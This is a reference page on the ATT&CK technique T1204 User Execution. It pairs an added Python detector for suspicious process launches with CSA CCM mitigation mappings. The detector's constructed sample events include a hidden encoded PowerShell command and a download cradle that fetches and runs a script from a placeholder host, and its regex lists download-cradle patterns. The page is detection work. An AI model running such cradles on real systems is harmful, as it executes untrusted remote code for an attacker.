T1204 User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Adversaries may also deceive users into performing actions such as:

  • Enabling Remote Access Tools, giving the adversary direct control of the system
  • Running malicious JavaScript in their browser, allowing adversaries to Steal Web Session Cookies (Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
  • Downloading and executing malware
  • Copying, pasting, and manually executing malicious code they have been coerced into running (Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)

For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or Remote Access Tools.(Citation: Telephone Attack Delivery)
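Each of the behaviors above (opening a malicious document, running a downloaded payload, pasting a one-liner into a Run dialog or terminal) leaves the same footprint in endpoint telemetry: a parent that should not be launching anything spawns a scripting host or a freshly downloaded binary. The following detection logic is an added example written for this page, not code from MITRE ATT&CK, the cited reports or CSA. It assumes Sysmon-style process-creation events flattened to JSON with ProcessId, Image, ParentImage and CommandLine fields; the parent/child pairings, the command-line patterns and every sample event are constructed assumptions for the example rather than vetted indicators.

```python
"""Added example for this page: flag T1204 User Execution patterns in
process-creation telemetry. This is illustrative detection logic, not code
from ATT&CK, MITRE or CSA. It assumes Sysmon-style Event ID 1 records
flattened to JSON with the fields ProcessId, Image, ParentImage and
CommandLine; every sample event below is constructed, not captured."""
from __future__ import annotations

import json
import re
from pathlib import PureWindowsPath

# Parents that should rarely spawn scripting hosts or fresh binaries:
# document viewers (malicious document), browsers (downloaded payload) and
# the desktop shell, which parents Win+R launches used by "paste this" lures.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line traits typical of pasted one-liners: hidden window, encoded
# payload or a download cradle. The pattern list is an assumption for this
# example and would be tuned against real telemetry.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|invoke-webrequest|\biwr\b|\birm\b|downloadstring"
    r"|mshta(\.exe)?\s+https?://)",
    re.IGNORECASE,
)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows image path ('' if path is empty)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the T1204 indicators that match one process-creation event."""
    child = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    hits: list[str] = []
    # Opened a malicious document: Office/PDF reader spawning a script host.
    if parent in DOCUMENT_APPS and child in SCRIPT_HOSTS:
        hits.append("document-spawned-script-host")
    # Downloaded and ran a payload: browser launching a binary from Downloads.
    if parent in BROWSERS and "\\downloads\\" in image:
        hits.append("browser-launched-download")
    # Copy-paste lure: shell-parented script host with cradle-like arguments.
    if parent == "explorer.exe" and child in SCRIPT_HOSTS and SUSPICIOUS_ARGS.search(cmd):
        hits.append("shell-pasted-command")
    return hits


def scan(jsonl: str) -> list[tuple[int, list[str]]]:
    """Run classify() over newline-delimited JSON events; return (ProcessId, hits) for matches."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        hits = classify(ev)
        if hits:
            findings.append((ev.get("ProcessId", -1), hits))
    return findings


# Constructed sample telemetry (raw string so the JSON backslashes survive).
SAMPLE_EVENTS = r"""
{"ProcessId": 4101, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ProcessId": 4102, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/verify.ps1 | iex\""}
{"ProcessId": 4103, "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "Image": "C:\\Users\\alice\\Downloads\\Invoice_2024.exe", "CommandLine": "\"C:\\Users\\alice\\Downloads\\Invoice_2024.exe\""}
{"ProcessId": 4104, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}
{"ProcessId": 4105, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
"""

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS):
        print(f"PID {pid}: {', '.join(hits)}")
```

Only three of the five constructed events fire: the Word-spawned PowerShell, the Explorer-parented download cradle, and the binary launched from the Downloads folder. The two benign Explorer children (Notepad, and an interactive PowerShell with no arguments) are deliberately left unflagged, because the explorer.exe parent alone is far too common to alert on; the command-line traits carry the signal for the copy-paste case, and in production they would be tuned against the fleet's own baseline.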


CSA CCM Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name

AIS-08 | API Security | mitigates | T1204 | User Execution
Comments: This control implements measures to secure APIs. Application control, together with monitoring for and blocking malicious API calls, can help prevent user execution of malware through APIs in cloud consoles.

I&S-04 | OS Hardening and Base Controls | mitigates | T1204 | User Execution
Comments: This control implements secure configuration best practices for hardening cloud platforms to mitigate adversary exploitation and abuse of system functionality. Application control can help prevent the running of executables masquerading as other file types.

UEM-05 | Endpoint Management | mitigates | T1204 | User Execution
Comments: This control provides for the implementation of endpoint management best practices. Malicious executables can be prevented from running by implementing application control, script blocking, and other execution prevention mechanisms.

UEM-09 | Anti-Malware Detection and Prevention | mitigates | T1204 | User Execution
Comments: This control describes the implementation of endpoint security, including anti-malware software, to mitigate the risk of exploitation by threat actors. The implementation guidance gives several examples of what the technical measures under Anti-Malware should help prevent, including: scanning installed software and system data to identify and remove unauthorized code or software; prohibiting the installation or use of unauthorized software; restricting the retrieval of malicious data and software from external networks; and managing removable media on endpoints.

UEM-14 | Third-Party Endpoint Security Posture | mitigates | T1204 | User Execution
Comments: This control provides for the implementation of best practices for managing third-party endpoints. Malicious executables can be prevented from running by implementing application control, script blocking, and other execution prevention mechanisms.

ATT&CK Subtechniques

Technique ID | Technique Name | Number of Mappings
T1204.003 | Malicious Image | 3